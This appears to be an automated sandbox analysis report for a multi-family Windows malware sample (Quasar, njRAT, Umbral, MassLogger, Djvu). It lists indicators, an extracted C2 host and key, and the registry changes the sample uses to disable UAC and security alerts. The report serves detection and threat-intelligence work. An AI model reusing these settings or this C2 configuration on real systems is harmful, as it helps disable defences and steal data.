djvu | 58eb428bcff04e7c5811a1cdf97ad44af572897dad76da22c91979ff8c3a9970

Analysis

max time kernel
360s
max time network
373s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
24-05-2024 22:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vir.exe
Size

312.3MB
MD5

ae35fad90172838912e2b8c89eb8339d
SHA1

6d223c22b1df81eb77608a262fe85f886702e51f
SHA256

58eb428bcff04e7c5811a1cdf97ad44af572897dad76da22c91979ff8c3a9970
SHA512

69419530155a7b13b884a04cad82405c3520eacbb0f2915bab9afdb0f04feb1f39c4bfcbdf86f596ed49aa884e1434f935692ff9c6f5cf686cf0fbc92a214793
SSDEEP

6291456:I2qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHvdHVeVn:br+WeSWgfecGT4RjvqP85FAh

Score

10^/10

djvu masslogger njrat quasar umbral romka collection discovery evasion execution exploit persistence ransomware spyware stealer trojan upx

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

romka

jozzu420-51305.portmap.host:51305

Mutex

0445c342-b551-411c-9b80-cd437437f491

Attributes

encryption_key
E1BF1D99459F04CAF668F054744BC2C514B0A3D6
install_name
Romilyaa.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows 10 Boot
subdirectory
SubDir

Signatures

Detect Umbral payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\SolaraBootstraper.exe	family_umbral
C:\Users\Admin\AppData\Local\Temp\Umbral.exe	family_umbral
behavioral1/memory/5772-6297-0x00000176862C0000-0x0000017686300000-memory.dmp	family_umbral

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
MassLogger
Masslogger is a .NET stealer targeting passwords from browsers, email and cryptocurrency clients.
stealer spyware masslogger

MassLogger Main payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4348-8631-0x0000000000400000-0x0000000000541000-memory.dmp	family_masslogger
behavioral1/memory/4348-8630-0x0000000000B20000-0x0000000000BBA000-memory.dmp	family_masslogger

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

Rover.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Program Files (x86)\\rover\\rover.exe"	Rover.exe

Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Processes:

ooezvphdfx.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	ooezvphdfx.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Processes:

ooezvphdfx.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	ooezvphdfx.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\scary.exe	family_quasar
behavioral1/memory/2852-4292-0x0000000000090000-0x00000000003B4000-memory.dmp	family_quasar

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

Rover.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Rover.exe
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Windows security bypass 2 TTPs 5 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

ooezvphdfx.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	ooezvphdfx.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	ooezvphdfx.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	ooezvphdfx.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	ooezvphdfx.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	ooezvphdfx.exe

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 2 IoCs

Processes:

mshta.exerundll32.exe

flow pid process

53 2280 mshta.exe
93 5004 rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

4764 powershell.exe

flow	pid	process
53	2280	mshta.exe
93	5004	rundll32.exe

pid	process
4764	powershell.exe

Disables RegEdit via registry modification 1 IoCs

evasion

Processes:

ooezvphdfx.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	ooezvphdfx.exe

Drops file in Drivers directory 6 IoCs

Processes:

Umbral.exeDrvInst.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\SET79BF.tmp	DrvInst.exe
File created	C:\Windows\System32\drivers\SET79BF.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\drivers\droidcam.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\drivers\drmk.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\drivers\portcls.sys	DrvInst.exe

Manipulates Digital Signatures 1 TTPs 1 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

Processes:

msedge.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\B2B733A9939D7A8F524FCA32B9A7265E5FD7E900\Blob = 0f000000010000001400000030b06f824bf62f85848f53ca009413f10dd7ef010200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000320033003500660062003400650066002d0034006400380065002d0034003100310035002d0062003300330065002d0064003700610039003400620037003700620061003700390000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000b2b733a9939d7a8f524fca32b9a7265e5fd7e900200000000100000000030000308202fc308201e4a00302010202102a6780f3335ef28147333f6b1c4724eb300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234303532343232353933325a180f32313234303433303232353933325a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100c95ee089bba99ab1ffc656a9537c2160803873e4ef280acd38288513ff2947406cb2004bbcc20d5422579ddcf17310abe5ae5e10996db6a0cd323658082afbb38e1af57f7afc288d22b29c337a906c82b8c5470c2a4566ce01d977cb556650fc755f7036445366a4db7dd911b6e1bffdc89373d53ea27421ca7aa7a5b7c6ae5a49bc698d91b0c56dc393910bb51b869ab4cdeed4306e21937b118de9bdb5cdb9d51c8468208b20d8d908833279549d615a7a750df8e99244812a5d45d25336bfec38d9bcb8031b97f4afd235f17274f8004236471bdc1f449083a0bd0d7a1c1ba89249f8566bf67bd41c6181b54b1ea0406969d2f03fb0695b49bb2271e5e2690203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e40475341474d4843510030090603551d1304023000300d06092a864886f70d01010505000382010100263fa4b20317db67d06ce256496e0ab96042bff79e6dd95663023ccc17b74252584b35cda78073fecead70a931b11c3acefa37f1693732763fdadeed4dd42d2b6dcd6cb0172579354ddde776fb5125eaa0d7f32e24a5766083fccf077ef0f0eea031681b3f2fbec17bab02c5c87203a538b24e7c27d6bf0a082573f006c87178a10e2eb0ac6d4caedcf318a224bd8e35e2a72223d42f77f148914a1c375dbf882e0390f03ded5555a4dcd8867fe855cb57d41b9addae9c93cc5aa69395dbb33cd10ca2f3008673c3536426a5bf4cc747e6ebacee85707156f7753216638a988b2bc64a751112dc41fc0964361e300dfb32282e5b8a7ba518226b1b578707f30f	msedge.exe

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

5028 netsh.exe
Possible privilege escalation attempt 5 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exeicacls.exetakeown.exe

pid process

5140 icacls.exe
4228 takeown.exe
3092 icacls.exe
5084 icacls.exe
4484 takeown.exe

pid	process
5028	netsh.exe

pid	process
5140	icacls.exe
4228	takeown.exe
3092	icacls.exe
5084	icacls.exe
4484	takeown.exe

.NET Reactor proctector 35 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral1/memory/4580-138-0x00000000060C0000-0x0000000006610000-memory.dmp	net_reactor
behavioral1/memory/4580-139-0x0000000005B70000-0x00000000060BE000-memory.dmp	net_reactor
behavioral1/memory/4580-143-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-145-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-153-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-161-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-170-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-172-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-178-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-182-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-180-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-191-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-210-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-219-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-222-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-212-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-203-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-193-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-201-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-189-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-187-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-185-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-176-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-174-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-168-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-166-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-163-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-159-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-156-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-157-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-149-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-151-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-141-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-147-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor
behavioral1/memory/4580-140-0x0000000005B70000-0x00000000060B9000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

vir.execmd.execmd.exejaffa.exepacker.execmd.exeSolaraBootstraper.execmd.exesjhkhda.exeselfaware.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	vir.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	jaffa.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	packer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	SolaraBootstraper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	sjhkhda.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	selfaware.exe

Drops startup file 3 IoCs

Processes:

!FIXInj.exenotepad.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe	!FIXInj.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe	!FIXInj.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.vbs	notepad.exe

Executes dropped EXE 42 IoCs

Processes:

ProgressBarSplash.exeRover.exeGoogle.exeregmess.exe1.exe3.exeWinaeroTweaker-1.40.0.0-setup.exeWinaeroTweaker-1.40.0.0-setup.tmpscary.exethe.exewimloader.dllRomilyaa.exeac3.exevc_redist.x86.exevc_redist.x86.exeinsdrv.exeinsdrv.exefreebobux.exeSolaraBootstraper.exeCLWCP.exewim.dllSolaraBootstrapper.exeUmbral.exe!FIXInj.exef3cb220f1aaa32ca310586e5f62dcab1.exejaffa.exejkka.exeselfaware.exeselfaware.exesjhkhda.exesjhkhda.exesjhkhda.exeooezvphdfx.exefvqnkqqa.exeqmrkzlocgnnaroc.exevrzzpxqgisjoe.exeselfaware.exeselfaware.exepacker.exefvqnkqqa.exeProgressBarSplash.exe3.exe

pid	process
2628	ProgressBarSplash.exe
4580	Rover.exe
2932	Google.exe
2496	regmess.exe
1836	1.exe
3256	3.exe
3608	WinaeroTweaker-1.40.0.0-setup.exe
5548	WinaeroTweaker-1.40.0.0-setup.tmp
2852	scary.exe
5564	the.exe
5332	wimloader.dll
5948	Romilyaa.exe
4368	ac3.exe
3924	vc_redist.x86.exe
5128	vc_redist.x86.exe
5764	insdrv.exe
5156	insdrv.exe
2364	freebobux.exe
6016	SolaraBootstraper.exe
1780	CLWCP.exe
2156	wim.dll
2344	SolaraBootstrapper.exe
5772	Umbral.exe
2404	!FIXInj.exe
7036	f3cb220f1aaa32ca310586e5f62dcab1.exe
4196	jaffa.exe
6648	jkka.exe
2932	selfaware.exe
6304	selfaware.exe
5244	sjhkhda.exe
4348	sjhkhda.exe
3380	sjhkhda.exe
7124	ooezvphdfx.exe
5012	fvqnkqqa.exe
2760	qmrkzlocgnnaroc.exe
3620	vrzzpxqgisjoe.exe
6100	selfaware.exe
4220	selfaware.exe
5852	packer.exe
4488	fvqnkqqa.exe
6268	ProgressBarSplash.exe
928	3.exe

Loads dropped DLL 10 IoCs

Processes:

1.exeWinaeroTweaker-1.40.0.0-setup.tmpvc_redist.x86.exeregsvr32.exeregsvr32.exeregsvr32.exe

pid	process
1836	1.exe
1836	1.exe
1836	1.exe
5548	WinaeroTweaker-1.40.0.0-setup.tmp
1836	1.exe
1836	1.exe
5128	vc_redist.x86.exe
4768	regsvr32.exe
5032	regsvr32.exe
1100	regsvr32.exe

Modifies file permissions 1 TTPs 5 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exetakeown.exe

pid process

3092 icacls.exe
5084 icacls.exe
4484 takeown.exe
5140 icacls.exe
4228 takeown.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
3092	icacls.exe
5084	icacls.exe
4484	takeown.exe
5140	icacls.exe
4228	takeown.exe

Registers COM server for autorun 1 TTPs 21 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Processes:

DrvInst.exeregsvr32.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96462-78F3-11d0-A18C-00A0C9118956}\InprocServer32\ThreadingModel = "Both"	DrvInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{266EEE40-6C63-11cf-8A03-00AA006ECB65}\InprocServer32\ = "%SystemRoot%\\System32\\kstvtune.ax"	DrvInst.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{266EEE41-6C63-11cf-8A03-00AA006ECB65}\InprocServer32\ = "%SystemRoot%\\System32\\kstvtune.ax"	DrvInst.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{266EEE41-6C63-11cf-8A03-00AA006ECB65}\InprocServer32\ThreadingModel = "Both"	DrvInst.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96460-78F3-11d0-A18C-00A0C9118956}\InprocServer32\ = "%SystemRoot%\\System32\\ksxbar.ax"	DrvInst.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96460-78F3-11d0-A18C-00A0C9118956}\InprocServer32\ThreadingModel = "Both"	DrvInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96461-78F3-11d0-A18C-00A0C9118956}\InprocServer32	DrvInst.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ = "C:\\Program Files (x86)\\DroidCam\\lib\\DroidCamFilter64.ax"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ThreadingModel = "Both"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96460-78F3-11d0-A18C-00A0C9118956}\InprocServer32	DrvInst.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96461-78F3-11d0-A18C-00A0C9118956}\InprocServer32\ = "%SystemRoot%\\System32\\ksxbar.ax"	DrvInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96462-78F3-11d0-A18C-00A0C9118956}\InprocServer32	DrvInst.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96462-78F3-11d0-A18C-00A0C9118956}\InprocServer32\ = "%SystemRoot%\\System32\\ksxbar.ax"	DrvInst.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96463-78F3-11d0-A18C-00A0C9118956}\InprocServer32\ = "%SystemRoot%\\System32\\ksxbar.ax"	DrvInst.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96463-78F3-11d0-A18C-00A0C9118956}\InprocServer32\ThreadingModel = "Both"	DrvInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{266EEE40-6C63-11cf-8A03-00AA006ECB65}\InprocServer32	DrvInst.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{266EEE40-6C63-11cf-8A03-00AA006ECB65}\InprocServer32\ThreadingModel = "Both"	DrvInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{266EEE41-6C63-11cf-8A03-00AA006ECB65}\InprocServer32	DrvInst.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96461-78F3-11d0-A18C-00A0C9118956}\InprocServer32\ThreadingModel = "Both"	DrvInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96463-78F3-11d0-A18C-00A0C9118956}\InprocServer32	DrvInst.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\freebobux.exe	upx
C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\bloatware\3.exe	upx
behavioral1/memory/3256-3389-0x0000000000B50000-0x0000000002177000-memory.dmp	upx
behavioral1/memory/3256-3443-0x0000000000B50000-0x0000000002177000-memory.dmp	upx
behavioral1/memory/2364-6238-0x0000000000400000-0x000000000083E000-memory.dmp	upx
behavioral1/memory/2364-7949-0x0000000000400000-0x000000000083E000-memory.dmp	upx
behavioral1/memory/928-11380-0x0000000000750000-0x0000000001D77000-memory.dmp	upx
behavioral1/memory/928-11384-0x0000000000750000-0x0000000001D77000-memory.dmp	upx

Windows security modification 2 TTPs 6 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

ooezvphdfx.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	ooezvphdfx.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	ooezvphdfx.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	ooezvphdfx.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirstRunDisabled = "1"	ooezvphdfx.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	ooezvphdfx.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	ooezvphdfx.exe

Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs

collection

Email Collection

T1114

Processes:

sjhkhda.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook	sjhkhda.exe
Key queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook	sjhkhda.exe
Key opened	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook	sjhkhda.exe
Key opened	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key opened	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key opened	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key opened	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook	sjhkhda.exe
Key queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
